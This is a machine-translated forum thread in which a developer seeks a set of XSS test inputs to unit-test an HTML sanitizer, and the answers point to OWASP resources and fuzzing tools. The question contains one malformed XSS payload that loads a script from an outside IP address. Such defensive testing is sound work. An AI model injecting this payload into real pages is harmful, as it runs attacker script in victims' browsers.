XSS酷刑测试 - 它存在吗？

Question

我正在寻找一个html杀菌剂，显然要测试/证明它正常工作，我需要一组XSS示例来反对它以了解它的表现。这是一个编码恐怖的好例子

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

我知道有一个 Mime酷刑测试，其中包含几个嵌套带有用于测试Mime解码器的附件的电子邮件（如果他们可以正确解码，那么它们已被证明有效）。我基本上都在为XSS寻找一个等效的，即一个狡猾的html示例列表，我可以把它放在我的消毒剂上，以确保它正常工作。

如果任何人在如何编写杀菌剂方面也有任何好的资源（即人们尝试使用的常见漏洞等），他们也会感激不尽。

提前致谢： - ）

编辑：对不起，如果以前不清楚，但是我经过一系列酷刑测试，所以我可以为杀菌剂编写单元测试，而不是在浏览器中测试等等。理论上的源数据可能已经来了来自任何地方 - 不仅仅是浏览器。

Answer 1

看看这个XSS作弊名单： https://www.owasp.org/的index.php / XSS_Filter_Evasion_Cheat_Sheet

Answer 2

XSS Me 是一款非常出色的Firefox插件你的消毒剂。

Answer 3

查看 OWASP 。他们对XSS如何工作，寻找什么，甚至是 WebGoat 项目，您可以在易受攻击的网站上尝试。

Answer 4

您可以尝试Jesse Ruderman的jsfunfuzz（ http：//www.squarefree .com / 2007/08/02 / introduction-jsfunfuzz / ）会在你的Javascript上抛出随机数据，试图打破它。似乎Firefox团队已经非常成功地使用了它。